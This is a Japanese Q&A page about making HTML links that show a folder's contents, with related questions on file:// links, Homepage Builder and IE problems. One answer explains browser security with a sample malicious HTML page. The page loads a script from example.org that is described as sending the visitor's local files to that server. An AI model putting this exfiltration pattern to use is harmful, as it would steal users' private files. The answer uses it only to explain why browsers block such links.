質問投稿でgooポイントが当たるキャンペーン実施中!!>>

初心者です。
ホームページビルダでHPをつくっています。

あるテキストにリックを貼って、そのリンクを押すと
別ウィンドウで任意のフォルダの中身を表示するようにしたいのですが
どうしたらいいのでしょう?

<a href="フォルダ名/ファイル名">~</a>
だとファイル1個にしかリンクを貼れないので面倒です。
このフォルダ内全てのファイルを見えるようにしたいので、
フォルダごとリンクを貼りたいのです。

よろしくお願いいたします。

このQ&Aに関連する最新のQ&A

A 回答 (3件)

<a href="フォルダ名">~</a> でいいです(targetはお好みで)。

ただし、そのディレクトリに.htaccessを置いて、

  Options +Indexes

を書いていないと一覧表示にはなりません。普通は一覧表示を「しない」設定になっているハズです。当然.htaccessが使えない(&一覧表示をしない設定の)サーバでは無理です。
    • good
    • 0
この回答へのお礼

有難うございました。
できました(^-^)

お礼日時:2008/02/02 00:09

※参考程度に読んでください※



セキュリティー上の問題はさて置いて…
.htaccessを置かなくてもフォルダ一覧表示を許可してるサーバーもありますね。
私が借りているプロバイダー提供のサーバーはフォルダ一覧表示出来ます。
ぷ○らです ^^;
    • good
    • 0
この回答へのお礼

コメントありがとうございます。
No.2の方のお礼の欄にも記載しましたが、
今回仕事で利用する関係上、残念ながらレンタルサーバは使えない
可能性が高いです。
でも、いろいろと勉強になりました。

お礼日時:2008/02/02 00:14

こんにちは(^^



「フォルダの中身を表示する」というのはセキュリティー上好ましくない場合が多く、禁止されたりしていて、その場合エラー表示になったりします。

例えば、フォルダを指定してリンクをはる場合、
<a href="フォルダ名/">○○○</a>
の様にしますが、指定されたフォルダの表示はされず「403 Forbidden」のような表示が出てきてしまいます。
(ただしindex.htmlがある場合は、そちらを優先して表示します)

この禁止された状態を解除するためは、shimixさんが書いておられるように「.htaccess」を設定しなくてはなりません。
しかし、自由に設定させてもらえるサーバーは少ないかもしれません。(少なくとも無料サービスなどでは無理?)

まぁ、フォルダごと表示させてしまうと、中身が全部見えてしまいますし、そこで表示されるページのデザインも寂しいので、リンクさせたいファイルが、どの程度そのフォルダにあるか分かりませんが、面倒でもHTMLを書いた方が無難かも。

ちなみに、.htaccessを使えるサーバーを書いたページを紹介しておきます。

参考URL:http://htaccess.pasoa.com/rental.htm
    • good
    • 0
この回答へのお礼

回答有難うございます。
せっかくご紹介いただいたんですが、
今回、会社で使用するので、残念ながら使えないかもしれません。
個人的に利用したいと思います。

お礼日時:2008/02/02 00:12

このQ&Aに関連する人気のQ&A

お探しのQ&Aが見つからない時は、教えて!gooで質問しましょう!

このQ&Aを見た人はこんなQ&Aも見ています

このQ&Aを見た人が検索しているワード

このQ&Aと関連する良く見られている質問

Qファイルやフォルダーにリンクを張る

ファイルやフォルダーにリンクを張るやり方を教えてください。

エクセルにパソコン内のファイル名をそれぞれ記入して、

そこにリンクを貼りたいんです

Aベストアンサー

挿入 - ハイパーリンク で対象のファイルやフォルダを選択してOKをクリックします。

Qハイパーリンクをフォルダーにする方法

Word・Excelではハイパーリンクを設定できますが、ファイルに対してのみリンクを張ることができます(もちろん、本来はURLを指定するのでしょうけれど)。
これを、フォルダーにリンクできないでしょうか?
つまり、マイドキュメントのフォルダーにハイパーリンクを設定して、クリックするとマイドキュメントフォルダーが開くというものです。
どなたか、教えていただければ幸いです。

Aベストアンサー

windows98ですが、EXCELでハイパーリンクを選んで、
ファイルのところに「c:\My Documents」と入力すればできます。

QHTMLからフォルダを開きたい

いつも大変お世話になります<(_ _)>

Webサーバー上にあるWebページ(HTML)の中に、ローカルPCのフォルダを開くリンクを付けたいのですが、
<a href="file://c:\windows">OPEN</a>
としても、何も反応しません。

いろいろ調べたのですが、上記の方法しか見あたりません。

なお、ブラウザのアドレス欄に file://c:\windows と入力すると、フォルダの内容が表示されます。
※Firefoxだと、ファイルの一覧になりますが・・・

何か環境によって挙動が異なるのでしょうか?
それとも、セキュリティ上の観点から最近じゃ出来なくなっているのでしょうか?

是非ともお助け下さい。宜しくお願い致します。

Aベストアンサー

file:///C:/windows/
/は三つでは・・・
 IEの場合はエクスプローラ(ファイルマネージャ)が開くような・・・
 IEはファイルマネージャーと一体のブラウザなので・・・

★実は、ローカルサーバーが必要です。
 apacheでも何でも良いので、WEBデータの入っているフォルダーを
<VIRTUALHOST 127.0.0.1>
C:\Document and settings\my document\web
 とかに指定して、Windowsのhostsファイルで、適当なサーバー名を指定しておきます。
myLocalhost 127.0.0.1
とか・・・

 そうすると
http://myLoclahost/
 で開けます。

 

Qホームページビルダー リンク設定できない

ホームページビルダーで作っているのですが リンクできません
ビジュアルサイトビューでリンク設定できたらツリーみたいになるはずなのに
リンクされていないHTMLファイルのとこにあるのですが
リンク挿入 ページリンク作成する リンク先INDEX.HTMLとつなげたいのですが
どうしたらいいのですか?

Aベストアンサー

親ウィンドウ(index.html)のページを開きます。
その中の「この部分にリンクを貼りたい」というところを反転させます(文字の場合)。
ロゴや画像の場合はその部分をクリックするだけでOK。
そのリンクを貼りたいところで右クリックすれば、「リンク挿入」があります。
別ウィンドウが出てきます。
「参照」ボタンでどのページをリンクしたいのか設定。
一番下に「ターゲット」があります。
このターゲットで別ウィンドウを開くのか、フレーム使用で右側に開くのかなどを設定します。

右クリック→リンク挿入でなくても、
リンクを設定したいところをクリックして、ツールバーにある「挿入」→リンクでも出来ます。

他には、ご質問にある「ビジュアルサイトビュー」で、
「リンクされていないHTMLファイル」にあるページをリンクしたいページまでドラッグすることも出来ます。リンク解除したいときには、逆に「リンクされていないHTMLファイル」にドラッグすれば元通りですね。

http://www-6.ibm.com/jp/domino01/swhc/esupport.nsf/key/49256A6A0001F136492568B70015C90E?opendocument

参考URL:http://www-6.ibm.com/jp/domino01/swhc/esupport.nsf/key/49256A6A0001F136492568B70015C90E?opendocument

親ウィンドウ(index.html)のページを開きます。
その中の「この部分にリンクを貼りたい」というところを反転させます(文字の場合)。
ロゴや画像の場合はその部分をクリックするだけでOK。
そのリンクを貼りたいところで右クリックすれば、「リンク挿入」があります。
別ウィンドウが出てきます。
「参照」ボタンでどのページをリンクしたいのか設定。
一番下に「ターゲット」があります。
このターゲットで別ウィンドウを開くのか、フレーム使用で右側に開くのかなどを設定します。

右クリック→リン...続きを読む

QHTMLで別PCのフォルダを開く

例えばネットワーク上に”192.168.100.250”というPCがあるとします。

このPCはフォルダウィンドウでフォルダ内を閲覧出来る場合、

別のサーバーのHTMLファイルから、

このフォルダを開く事は出来ますか?

以下のコードを追加して、testをクリックしても何も起こりません。。。

<a href="file:\\192.168.100.250\test">test</a>

どなたかお分かりになる方教えてください。

Aベストアンサー

[ANo.7] の続きね。

Firefox を例にするね。

■ ウェブブラウザのセキュリティ第1段階

1) Firefox でロケーションバーに "file:///c:/" を入力すると、『C:\』のフォルダの一覧が表示される。他のフォルダを入力すれば、同じように、そのフォルダの一覧が表示される。

2) 質問者さんは、悪意のあるウェブページとは知らずに、"http://example.org/akuinoaru.html" をダウンロードして、デスクトップに保存したとする。

その HTML の内容は↓これ。

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
  <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
  <title>Akuinoaru JavaScript Sample</title>
  <script type="text/javascript" src="http://example.org/akuinoaru.js"></script>
</head>
<body>
  <h1>Akuinoaru JavaScript Sample</h1>
  <div>
    <iframe id="iframe" width="100%" height="600" src="."></iframe>
  </div>
</body>
</html>

3) 質問者さんは、保存した HTML を Firefox で開くとする。

4) すると、デスクトップにあるファイルの一覧が表示される。

5) 『4)』とほぼ同時に "http://example.org/akuinoaru.js" が実行される。

6) akuinoaru.js は、表示されたフォルダの中にあるファイルを、
"http://example.org/akuinoaru.php" へ全て送信するという JavaScript だとする。

ということで、質問者さんの PC の中のファイルが、攻撃者のサーバに送信される。


つまり、『信頼できない HTML ファイルをダウンロードして、ウェブブラウザで開くのはすごく危険』ということ。


■ ウェブブラウザのセキュリティ第2段階

1) ウェブブラウザは、PC にウェブページのキャッシュを持つ。
つまり、自分でダウンロードしなくても、もともと HTML ファイルはダウンロードされているということ。

2) ここで、"http://example.org/akuinoaru.html" は "file:///ウェブページのキャッシュフォルダ/キャッシュファイル" へリンクを張ってあったとする(※)。

通常、このリンクはウェブブラウザによってセキュリティー上無効にされているけれど、これが有効だったとする。

3) 質問者さんは、上のページのリンクをクリックしたとする。

4) 以下、『ウェブブラウザのセキュリティ第1段階』の 『4)』と同じ。

今回は、リンクをクリックする想定をしたけど、実際はクリックしなくても、キャッシュファイルを表示させることができるから、悪意のあるページにアクセスしたら、すぐに、質問者さんの PC の中に保存されているファイルは、攻撃者のサーバに送信されてしまう。

このようなことが起こらないように、http://xxxxxx から file:/// へのリンクは無効にされている。


という説明で大丈夫かな?


※2) 実際には、キャッシュファイルのパスは固定じゃないから、JavaScript でがりがり生成して何回もトライしてキャッシュファイルのパスを見つける必要がある。でも危険なことには違いはない。

[ANo.7] の続きね。

Firefox を例にするね。

■ ウェブブラウザのセキュリティ第1段階

1) Firefox でロケーションバーに "file:///c:/" を入力すると、『C:\』のフォルダの一覧が表示される。他のフォルダを入力すれば、同じように、そのフォルダの一覧が表示される。

2) 質問者さんは、悪意のあるウェブページとは知らずに、"http://example.org/akuinoaru.html" をダウンロードして、デスクトップに保存したとする。

その HTML の内容は↓これ。

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional...続きを読む

Qホームページビルダーで作成したサイト情報の保存場所は?

ホームページビルダーで作成したサイト情報の保存場所は?

パソコンをWindows XPからWindows7に買い換えたので、XPで使っていた【ホームページビルダーV6.5】を7にインストールし直しました。
しかしサイト情報(FTPサーバーアドレスやパスワード)をメモしたテキストファイルを誤って削除してしまい、サイトの再構築ができなくなってしまいました…

そこで質問です。

もともと使っていたXPの中からサイトの情報(転送時に使うFTP情報)をコピーして7に持っていきたいのですが、ホームページビルダーで作成したサイト情報の保存場所はどこなのでしょうか?
ホームページビルダー自身はCドライブ内のprogram filesにあります。
調べたところ、サイト情報はそことは別に「C:\Windows\Application Data\Ibm\HomePage Builder Version 6」に入っているという情報を見つけたのですが、Windowsフォルダ内にApplication Dataというフォルダはありませんでした。
自分のミスで本当に情けない限りですが、XPでのホームページビルダーV6.5のサイト情報が保存されている場所をご存じの方、いましたらご回答のほど宜しくお願い致します。

ホームページビルダーで作成したサイト情報の保存場所は?

パソコンをWindows XPからWindows7に買い換えたので、XPで使っていた【ホームページビルダーV6.5】を7にインストールし直しました。
しかしサイト情報(FTPサーバーアドレスやパスワード)をメモしたテキストファイルを誤って削除してしまい、サイトの再構築ができなくなってしまいました…

そこで質問です。

もともと使っていたXPの中からサイトの情報(転送時に使うFTP情報)をコピーして7に持っていきたいのですが、ホームページビルダーで作成し...続きを読む

Aベストアンサー

windows7だと、ビルダーv6.5は未対応となっていますので、
もしかしたらうまく使用できないかもしれませんが・・・。

xpだとWindowsじゃなくてDocuments and Settings¥ユーザー名¥内にApplication Dataがあります。
その中にIBM¥HomePage Builder Version ●¥site¥があると思います。
siteをクリックしてください、ご自分が作成したサイト名(ビルダーのサイト一覧でのサイト名)のフォルダがあると思います。
このフォルダの中身のファイルを直接確認することはできないと思うのですが、サイト情報が保存されているのはこちらかもしれません。
(転送設定情報が含まれているかどうかは確認できませんでした。)

Qリンクへ飛べない

昨夜 リンクに飛べない(クリックをすると新しいウィンドが開く)ことが
突然できなくなりました。原因は解りません。その前に閉じたときに
自動更新があったので システムの復元でその前の状態に戻しましたが
無理でした。新しいウィンドを開かないリンクへはいけます
よろしくおねがいします。NECノートPC、WIN7です

Aベストアンサー

追加
>後は意味が解りません

(1)(ブラウザのセキュリティ設定でブロック解除例)
「ツール」「インターネットオプション」「全般」「Cookieの削除」「ファイルの削除」「OK」

「インターネットオプション」「セキュリティ」「レベルのカスタマイズ」レベル「中高」(「高」でないこと)

「ツール」「互換表示設定」互換表示を使用して表示する (表示されないよく使うサイト)Web サイトを追加
「インターネットオプション」「プライバシー」「詳細設定」「自動Cookie処理を上書きする」チェック
「詳細設定」「既定の設定に戻す」「適用」「OK」画面を閉じる。
「プログラム」「Webの設定のリセット」「はい」

(2)IE9をダウンロード、インストールして、不都合があれば、ロールバックする(「コントロールパネル」「プログラムの追加と削除」からIE9を「削除」)と既定のIE7やIE8に戻ります。

(3)他のブラウザ例えばFireFoxなどを一時的に使ってみる。
参考URL(リンクしないでしょうからFireFoxで検索)

(4)前回のリンクしないURLの概要は、

「ツール」「ポップアップブロック」「ポップアップブロックを無効にする」

ie8-rereg.zipについては、
作業ケース1
1) 「http://***」から、「ie8-rereg.zip」をダウンロード。(英語版でリンクもしないのでURLは除く)
2)ダウンロードしたzipファイルを解凍、「ie8-rereg」フォルダ生成
3)IEを終了
4)「ie8-rereg」フォルダ中「ie8-rereg.cmd」を右クリック「管理者として実行」
5)終了
6)IEを右クリック「管理者として実行」
作業ケース2
1) 「http://***」から、「ie8-rereg.zip」をダウンロード(リンクしないので略)
2)ダウンロードしたzipファイルを解凍、「ie8-rereg」フォルダ生成
3)IEを終了
4)「ie8-rereg」フォルダの「ie8-rereg.cmd」を右クリック「名前の変更」拡張子「cmd」の部分を「bat」にファイル名変更
5)「ie8-rereg.bat」を右クリック「管理者として実行」
6)終了
7)IEを右クリック「管理者として実行」

リンクを右クリック「開く」と「新しいウインドウで開く」は無反応、「新しいタブで開く」は反応します。との問いに、
動作しないリンク上で「CTRLキーを押しながらクリック」するとどうなるか?(ポップアップとなってしまうリンクをタブで開く効果がある)

「インターネットオプション」「全般」「タブ」で色々設定可能なので、そこを弄ると直る可能性がある。
一度IE8を削除して入れ直されてみては如何?(既定のIE8は削除できないので上書きするかIE9を入れてみる)

などです。
リンクしないURLを他のブラウザを使って閲覧してみるとか。

参考URL:http://mozilla.jp/firefox/

追加
>後は意味が解りません

(1)(ブラウザのセキュリティ設定でブロック解除例)
「ツール」「インターネットオプション」「全般」「Cookieの削除」「ファイルの削除」「OK」

「インターネットオプション」「セキュリティ」「レベルのカスタマイズ」レベル「中高」(「高」でないこと)

「ツール」「互換表示設定」互換表示を使用して表示する (表示されないよく使うサイト)Web サイトを追加
「インターネットオプション」「プライバシー」「詳細設定」「自動Cookie処理を上書きする」チェック
「詳細設...続きを読む

Qホームページビルダーで表の列幅を調整するには

ホームページビルダーホームページを使ってホームページを作成中です。
表を作りましたが,表の列幅が揃いません。プレビュー画面では大体同じ幅になっているのに,実際の表の列幅は揃っていません。
なぜ揃わないのでしょうか?また揃えるためにはどうしたら良いでしょうか?
ご教授お願いします。

Aベストアンサー

hpbを利用し、表を多用し Hpを作成しています。
100桁 4列作成する場合、
 <TABLE border="1">
<COL span="4" width="100">
<TBODY>
だけではなく、合計幅を入れると安定します。
           ↓
 <TABLE border="1" width="400">
<COL span="4" width="100">
<TBODY>

※ この場合も、その列に 100pxを超す画像を入れたり、
長い文字列にリンクを張ったりすると、幅がかわる可能性があります。
 


人気Q&Aランキング